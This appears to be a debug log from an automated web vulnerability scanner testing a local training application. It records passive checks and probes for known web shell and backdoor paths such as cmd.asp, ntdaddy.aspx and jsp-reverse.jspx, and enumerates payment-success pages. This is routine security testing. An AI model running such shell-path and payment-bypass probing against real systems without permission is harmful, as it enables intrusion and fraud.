(id=2923,from_cache=0,grep=1,rtt=0.31,did=6tNGQV6J) [Wed Feb 12 09:41:52 2020 - debug] http_in_body.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.47s to run [Wed Feb 12 09:41:52 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.14s to run [Wed Feb 12 09:41:52 2020 - debug] url_session.grep(uri="http://localhost:9090/servlet/cmdServlet") took 0.91s to run [Wed Feb 12 09:41:52 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.15s to run [Wed Feb 12 09:41:52 2020 - debug] html_comments.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.15s to run [Wed Feb 12 09:41:52 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.34s to run [Wed Feb 12 09:41:52 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/servlet/cmdServlet") took 1.16s to run [Wed Feb 12 09:41:52 2020 - debug] GET http://localhost:9090/inc/paymentsuccess.cgi returned HTTP code "404" (id=2918,from_cache=0,grep=1,rtt=0.13,did=szgty5wB) [Wed Feb 12 09:41:53 2020 - debug] POST http://localhost:9090/inc/payment.cgi returned HTTP code "404" (id=2928,from_cache=0,grep=1,rtt=0.31,did=4haHFYg8) [Wed Feb 12 09:41:53 2020 - debug] POST http://localhost:9090/includes/successful.asp returned HTTP code "404" (id=2929,from_cache=0,grep=1,rtt=0.47,did=0ABfDGwU) [Wed Feb 12 09:41:53 2020 - debug] GET http://localhost:9090/includes/validate.php5 returned HTTP code "404" (id=2934,from_cache=0,grep=1,rtt=0.28,did=XrSVvnY0) [Wed Feb 12 09:41:53 2020 - debug] POST http://localhost:9090/libraries/validatepayment.php returned HTTP code "404" (id=2926,from_cache=0,grep=1,rtt=0.40,did=t0gVImtJ) [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/modules/validpay.php5 returned HTTP code "404" (id=2924,from_cache=0,grep=1,rtt=0.16,did=Kfm5mch1) [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/inc/complete.aspx returned HTTP code "404" (id=2930,from_cache=0,grep=1,rtt=0.30,did=A7QgZcQZ) [Wed Feb 12 09:41:54 2020 - debug] symfony.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] private_ip.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] motw.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] meta_generator.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] retirejs.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] POST http://localhost:9090/inc/pay.cgi returned HTTP code "404" (id=2933,from_cache=0,grep=1,rtt=0.35,did=21LjnnIU) [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/module/finished.php returned HTTP code "404" (id=2935,from_cache=0,grep=1,rtt=0.11,did=8xoMJ2re) [Wed Feb 12 09:41:54 2020 - debug] POST http://localhost:9090/includes/paymentsuccessful.asp returned HTTP code "404" (id=2925,from_cache=0,grep=1,rtt=0.31,did=f0p6BYbg) [Wed Feb 12 09:41:54 2020 - debug] svn_users.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:41:54 2020 - debug] serialized_object.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] blank_body.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] credit_cards.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] websockets_links.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] csp.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] dom_xss.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] vulners_db.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] keys.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] file_upload.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] clamav.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] expect_ct.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:54 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/modules/paid.py returned HTTP code "404" (id=2927,from_cache=0,grep=1,rtt=0.05,did=jK7xMnzX) [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/servlet/paid.asp returned HTTP code "404" (id=2931,from_cache=0,grep=1,rtt=0.16,did=KBYiI5Zp) [Wed Feb 12 09:41:54 2020 - debug] GET http://localhost:9090/module/trxcomplete returned HTTP code "404" (id=2932,from_cache=0,grep=1,rtt=0.26,did=vZYqdcjb) [Wed Feb 12 09:41:54 2020 - debug] get_emails.grep(uri="http://localhost:9090/jsp-reverse.jspx") took 3.18s to run [Wed Feb 12 09:41:54 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] objects.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] error_500.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] meta_tags.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] password_profiling.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] click_jacking.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:54 2020 - debug] lang.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] GET http://localhost:9090/servlet/pay.aspx returned HTTP code "404" (id=2937,from_cache=0,grep=1,rtt=0.30,did=OqvSDJlZ) [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/servlet/completepayment returned HTTP code "404" (id=2938,from_cache=0,grep=1,rtt=0.17,did=8KwcowMJ) [Wed Feb 12 09:41:55 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:41:55 2020 - debug] Connections with more in use time: (ff37903b27d7f8f9, 0.22 sec) (51c120544df55e56, 0.07 sec) (62e87e81607155f6, 0.01 sec) [Wed Feb 12 09:41:55 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] GET http://localhost:9090/includes/paymentsuccess.cgi returned HTTP code "404" (id=2936,from_cache=0,grep=1,rtt=0.50,did=3KhhSWSQ) [Wed Feb 12 09:41:55 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=2939,from_cache=0,grep=0,rtt=0.18,did=LmWTLzzj) [Wed Feb 12 09:41:55 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: LmWTLzzj) [Wed Feb 12 09:41:55 2020 - debug] detailed._login() took 0.75s to run [Wed Feb 12 09:41:55 2020 - debug] error_pages.grep(uri="http://localhost:9090/cmd.asp") took 0.11s to run [Wed Feb 12 09:41:55 2020 - debug] strange_reason.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] cache_control.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/module/validation.php5 returned HTTP code "404" (id=2942,from_cache=0,grep=1,rtt=0.11,did=l4zDKwQ2) [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/includes/final.rb returned HTTP code "404" (id=2944,from_cache=0,grep=1,rtt=0.31,did=JuUwpdAc) [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/module/validatepayment.php returned HTTP code "404" (id=2940,from_cache=0,grep=1,rtt=0.22,did=PS62GN7i) [Wed Feb 12 09:41:55 2020 - debug] strange_headers.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] ssn.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] oracle.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] feeds.grep(uri="http://localhost:9090/cmd.asp") took 0.00s to run [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/modules/return.asp returned HTTP code "404" (id=2947,from_cache=0,grep=1,rtt=0.44,did=aQA6WnHy) [Wed Feb 12 09:41:55 2020 - debug] POST http://localhost:9090/module/finished.aspx returned HTTP code "404" (id=2949,from_cache=0,grep=1,rtt=0.16,did=Bz9HsIrC) [Wed Feb 12 09:41:56 2020 - debug] GET http://localhost:9090/libraries/paymentsuccessful.pl returned HTTP code "404" (id=2941,from_cache=0,grep=1,rtt=0.31,did=CqkOK0qV) [Wed Feb 12 09:41:56 2020 - debug] GET http://localhost:9090/includes/completepay.aspx returned HTTP code "404" (id=2946,from_cache=0,grep=1,rtt=0.11,did=X5LsHP9R) [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/module/validatepay.cgi returned HTTP code "404" (id=2943,from_cache=0,grep=1,rtt=0.19,did=i3HXgKfp) [Wed Feb 12 09:41:56 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/cmd.asp") took 0.16s to run [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/modules/validpay.php returned HTTP code "404" (id=2950,from_cache=0,grep=1,rtt=0.24,did=DVimm0WY) [Wed Feb 12 09:41:56 2020 - debug] GET http://localhost:9090/servlet/transactioncomplete.asp returned HTTP code "404" (id=2952,from_cache=0,grep=1,rtt=0.26,did=7Lf4GwHz) [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/inc/paymentsuccess.asp returned HTTP code "404" (id=2945,from_cache=0,grep=1,rtt=0.34,did=V8Pj4xfY) [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/servlet/pay.pl returned HTTP code "404" (id=2953,from_cache=0,grep=1,rtt=0.17,did=Rj7mKLsk) [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/includes/validate.php returned HTTP code "404" (id=2954,from_cache=0,grep=1,rtt=0.19,did=6rIasfPr) [Wed Feb 12 09:41:56 2020 - debug] GET http://localhost:9090/modules/success.asp returned HTTP code "404" (id=2955,from_cache=0,grep=1,rtt=0.04,did=GwsrSX8r) [Wed Feb 12 09:41:56 2020 - debug] POST http://localhost:9090/module/trxcomplete.cgi returned HTTP code "404" (id=2956,from_cache=0,grep=1,rtt=0.22,did=rwECcQwO) [Wed Feb 12 09:41:56 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 135. [Wed Feb 12 09:41:57 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.pl returned HTTP code "404" (id=2959,from_cache=0,grep=1,rtt=0.09,did=TcVjhegt) [Wed Feb 12 09:41:57 2020 - debug] POST http://localhost:9090/modules/paid.jsp returned HTTP code "404" (id=2951,from_cache=0,grep=1,rtt=0.21,did=nkiAa1zL) [Wed Feb 12 09:41:57 2020 - debug] POST http://localhost:9090/servlet/paid.py returned HTTP code "404" (id=2958,from_cache=0,grep=1,rtt=0.24,did=wkW9xDNn) [Wed Feb 12 09:41:57 2020 - debug] GET http://localhost:9090/libraries/valid.php5 returned HTTP code "404" (id=2962,from_cache=0,grep=1,rtt=0.21,did=LiafwR9l) [Wed Feb 12 09:41:57 2020 - debug] GET http://localhost:9090/module/return.pl returned HTTP code "404" (id=2963,from_cache=0,grep=1,rtt=0.23,did=xZxNnMlD) [Wed Feb 12 09:41:58 2020 - debug] GET http://localhost:9090/libraries/validatepayment.php returned HTTP code "404" (id=2966,from_cache=0,grep=1,rtt=0.21,did=ettxBzYH) [Wed Feb 12 09:41:58 2020 - debug] POST http://localhost:9090/inc/complete.pl returned HTTP code "404" (id=2948,from_cache=0,grep=1,rtt=0.10,did=RFrqCGZ6) [Wed Feb 12 09:41:58 2020 - debug] POST http://localhost:9090/includes/paymentsuccess.asp returned HTTP code "404" (id=2960,from_cache=0,grep=1,rtt=0.17,did=0v4tFH6j) [Wed Feb 12 09:41:58 2020 - debug] GET http://localhost:9090/includes/successful.asp returned HTTP code "404" (id=2961,from_cache=0,grep=1,rtt=0.21,did=bakc8y3N) [Wed Feb 12 09:41:58 2020 - debug] GET http://localhost:9090/modules/valid returned HTTP code "404" (id=2965,from_cache=0,grep=1,rtt=0.07,did=LWGeAtXH) [Wed Feb 12 09:41:58 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:4 / max:50 / total:53) [Wed Feb 12 09:41:58 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.50 sec) (51c120544df55e56, 0.16 sec) (62e87e81607155f6, 0.15 sec) (feefb3b1646a9d56, 0.12 sec) [Wed Feb 12 09:41:59 2020 - debug] POST http://localhost:9090/servlet/transactioncomplete.py returned HTTP code "404" (id=2971,from_cache=0,grep=1,rtt=0.18,did=2i78TvsU) [Wed Feb 12 09:41:59 2020 - debug] GET http://localhost:9090/servlet/payment.php5 returned HTTP code "404" (id=2957,from_cache=0,grep=1,rtt=0.38,did=IJNrPb4l) [Wed Feb 12 09:41:59 2020 - debug] GET http://localhost:9090/inc/paymentsuccessful.php returned HTTP code "404" (id=2964,from_cache=0,grep=1,rtt=0.18,did=wJ1VdrML) [Wed Feb 12 09:41:59 2020 - debug] GET http://localhost:9090/inc/payment.cgi returned HTTP code "404" (id=2967,from_cache=0,grep=1,rtt=0.28,did=9T1UeU86) [Wed Feb 12 09:41:59 2020 - debug] GET http://localhost:9090/includes/paymentsuccessful.asp returned HTTP code "404" (id=2972,from_cache=0,grep=1,rtt=0.14,did=R5EkZRPa) [Wed Feb 12 09:41:59 2020 - debug] POST http://localhost:9090/libraries/paymentsuccessful.php3 returned HTTP code "404" (id=2973,from_cache=0,grep=1,rtt=0.18,did=LTKVe83G) [Wed Feb 12 09:41:59 2020 - debug] symfony.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:41:59 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/cmd.asp") took 1.42s to run [Wed Feb 12 09:41:59 2020 - debug] file_upload.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:41:59 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:41:59 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:41:59 2020 - debug] url_session.grep(uri="http://localhost:9090/cmd.asp") took 1.42s to run [Wed Feb 12 09:41:59 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/cmd.asp") took 1.43s to run [Wed Feb 12 09:41:59 2020 - debug] http_in_body.grep(uri="http://localhost:9090/cmd.asp") took 1.43s to run [Wed Feb 12 09:41:59 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/cmd.asp") took 1.46s to run [Wed Feb 12 09:41:59 2020 - debug] GET http://localhost:9090/inc/pay.cgi returned HTTP code "404" (id=2968,from_cache=0,grep=1,rtt=0.34,did=ni5h6GVt) [Wed Feb 12 09:41:59 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/cmd.asp") took 1.45s to run [Wed Feb 12 09:41:59 2020 - debug] html_comments.grep(uri="http://localhost:9090/cmd.asp") took 1.46s to run [Wed Feb 12 09:41:59 2020 - debug] GET http://www.google.com/xhtml?q=site:localhost inurl:"/cms/app/webroot"&start=0 returned HTTP code "429" (id=2970,from_cache=0,grep=1,rtt=0.43,did=LNec2jc5) [Wed Feb 12 09:41:59 2020 - debug] Google is telling us to stop doing automated tests. [Wed Feb 12 09:41:59 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:41:59 2020 - debug] POST http://localhost:9090/modules/success.py returned HTTP code "404" (id=2974,from_cache=0,grep=1,rtt=0.22,did=Lj8ODUgK) [Wed Feb 12 09:41:59 2020 - debug] get_emails.grep(uri="http://localhost:9090/servlet/cmdServlet") took 2.76s to run [Wed Feb 12 09:41:59 2020 - debug] expect_ct.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:41:59 2020 - debug] svn_users.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/includes/final.rb returned HTTP code "404" (id=2976,from_cache=0,grep=1,rtt=0.15,did=apcECPur) [Wed Feb 12 09:42:00 2020 - debug] POST http://localhost:9090/module/return.php3 returned HTTP code "404" (id=2979,from_cache=0,grep=1,rtt=0.17,did=fYb1KDvR) [Wed Feb 12 09:42:00 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/module/validation.php5 returned HTTP code "404" (id=2980,from_cache=0,grep=1,rtt=0.12,did=efwBFV78) [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/module/transactioncomplete.php5 returned HTTP code "404" (id=2975,from_cache=0,grep=1,rtt=0.52,did=9TKjf9Nn) [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/module/validatepayment.php returned HTTP code "404" (id=2977,from_cache=0,grep=1,rtt=0.27,did=d2P1f48P) [Wed Feb 12 09:42:00 2020 - debug] private_ip.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/servlet/completepayment returned HTTP code "404" (id=2978,from_cache=0,grep=1,rtt=0.20,did=BlrJkNRG) [Wed Feb 12 09:42:00 2020 - debug] motw.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] meta_generator.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] retirejs.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] GET http://localhost:9090/module/finished.aspx returned HTTP code "404" (id=2982,from_cache=0,grep=1,rtt=0.25,did=9X0QzGFO) [Wed Feb 12 09:42:00 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:42:00 2020 - debug] serialized_object.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] blank_body.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:00 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] POST http://localhost:9090/includes/successful.py returned HTTP code "404" (id=2984,from_cache=0,grep=1,rtt=0.14,did=JlcYylco) [Wed Feb 12 09:42:01 2020 - debug] credit_cards.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] websockets_links.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] csp.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] dom_xss.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] vulners_db.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:42:01 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:10 / max:50 / total:52) [Wed Feb 12 09:42:01 2020 - debug] Connections with more in use time: (20c6fb7a85d275d0, 0.50 sec) (ff37903b27d7f8f9, 0.31 sec) (58295801e4769de9, 0.21 sec) (62e87e81607155f6, 0.19 sec) (51c120544df55e56, 0.15 sec) [Wed Feb 12 09:42:01 2020 - debug] keys.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] clamav.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] objects.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] error_500.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] GET http://localhost:9090/inc/paymentsuccess.asp returned HTTP code "404" (id=2981,from_cache=0,grep=1,rtt=0.49,did=6X4x4f1R) [Wed Feb 12 09:42:01 2020 - debug] POST http://localhost:9090/inc/completepayment.asp returned HTTP code "404" (id=2900,from_cache=0,grep=1,rtt=0.37,did=wVxWJFSu) [Wed Feb 12 09:42:01 2020 - debug] meta_tags.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:01 2020 - debug] GET http://localhost:9090/modules/return.asp returned HTTP code "404" (id=2983,from_cache=0,grep=1,rtt=0.49,did=4ebnSHyo) [Wed Feb 12 09:42:02 2020 - debug] POST http://localhost:9090/libraries/validatepayment.aspx returned HTTP code "404" (id=2986,from_cache=0,grep=1,rtt=0.19,did=uRPmWDiO) [Wed Feb 12 09:42:02 2020 - debug] POST http://localhost:9090/libraries/valid.php returned HTTP code "404" (id=2987,from_cache=0,grep=1,rtt=0.14,did=UgIS77gA) [Wed Feb 12 09:42:02 2020 - debug] password_profiling.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:02 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:02 2020 - debug] lang.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:02 2020 - debug] click_jacking.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:02 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:02 2020 - debug] POST http://localhost:9090/servlet/payment.php returned HTTP code "404" (id=2993,from_cache=0,grep=1,rtt=0.41,did=UkyvjSCH) [Wed Feb 12 09:42:02 2020 - debug] GET http://localhost:9090/module/trxcomplete.cgi returned HTTP code "404" (id=2988,from_cache=0,grep=1,rtt=0.09,did=Rjtfrssw) [Wed Feb 12 09:42:02 2020 - debug] POST http://localhost:9090/inc/pay.asp returned HTTP code "404" (id=2994,from_cache=0,grep=1,rtt=0.11,did=5j6FOHMq) [Wed Feb 12 09:42:02 2020 - debug] POST http://localhost:9090/inc/paymentsuccessful.aspx returned HTTP code "404" (id=2995,from_cache=0,grep=1,rtt=0.26,did=jBrECWhI) [Wed Feb 12 09:42:02 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1343, 'reject-seen-url': 1187, 'reject-out-of-scope': 34, 'accept': 211} [Wed Feb 12 09:42:03 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:42:03 2020 - debug] POST http://localhost:9090/includes/completepay.pl returned HTTP code "404" (id=2996,from_cache=0,grep=1,rtt=0.28,did=GvRzL5z4) [Wed Feb 12 09:42:03 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.php3 returned HTTP code "404" (id=2992,from_cache=0,grep=1,rtt=0.15,did=n3YFD8lp) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/servlet/pay.pl returned HTTP code "404" (id=2989,from_cache=0,grep=1,rtt=0.11,did=WXjXhXnV) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/modules/validpay.php returned HTTP code "404" (id=2991,from_cache=0,grep=1,rtt=0.54,did=rP9DQyZh) [Wed Feb 12 09:42:03 2020 - debug] error_pages.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.07s to run [Wed Feb 12 09:42:03 2020 - debug] strange_reason.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] cache_control.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] strange_headers.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] ssn.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] oracle.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] feeds.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.00s to run [Wed Feb 12 09:42:03 2020 - debug] POST http://localhost:9090/modules/valid.cgi returned HTTP code "404" (id=2985,from_cache=0,grep=1,rtt=0.42,did=OpZxugR8) [Wed Feb 12 09:42:03 2020 - debug] POST http://localhost:9090/includes/paymentsuccessful.py returned HTTP code "404" (id=2999,from_cache=0,grep=1,rtt=0.24,did=61GNFumg) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/servlet/paid.py returned HTTP code "404" (id=2997,from_cache=0,grep=1,rtt=0.20,did=6LbT0brL) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/module/validatepay.cgi returned HTTP code "404" (id=3000,from_cache=0,grep=1,rtt=0.31,did=jeZnIsBk) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/modules/paid.jsp returned HTTP code "404" (id=2998,from_cache=0,grep=1,rtt=0.20,did=PGmVqWqm) [Wed Feb 12 09:42:03 2020 - debug] POST http://localhost:9090/includes/final.php4 returned HTTP code "404" (id=3003,from_cache=0,grep=1,rtt=0.23,did=txHYgfrO) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/servlet/transactioncomplete.py returned HTTP code "404" (id=3002,from_cache=0,grep=1,rtt=0.19,did=m0h8MKjg) [Wed Feb 12 09:42:03 2020 - debug] GET http://localhost:9090/includes/validate.php returned HTTP code "404" (id=2990,from_cache=0,grep=1,rtt=0.30,did=FQObLKzb) [Wed Feb 12 09:42:03 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.59s to run [Wed Feb 12 09:42:03 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.76s to run [Wed Feb 12 09:42:03 2020 - debug] html_comments.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.59s to run [Wed Feb 12 09:42:04 2020 - debug] url_session.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.59s to run [Wed Feb 12 09:42:04 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/ntdaddy.aspx") took 0.61s to run [Wed Feb 12 09:42:04 2020 - debug] GET http://localhost:9090/includes/paymentsuccess.asp returned HTTP code "404" (id=3001,from_cache=0,grep=1,rtt=0.09,did=XIFmZ9Vf) [Wed Feb 12 09:42:04 2020 - debug] 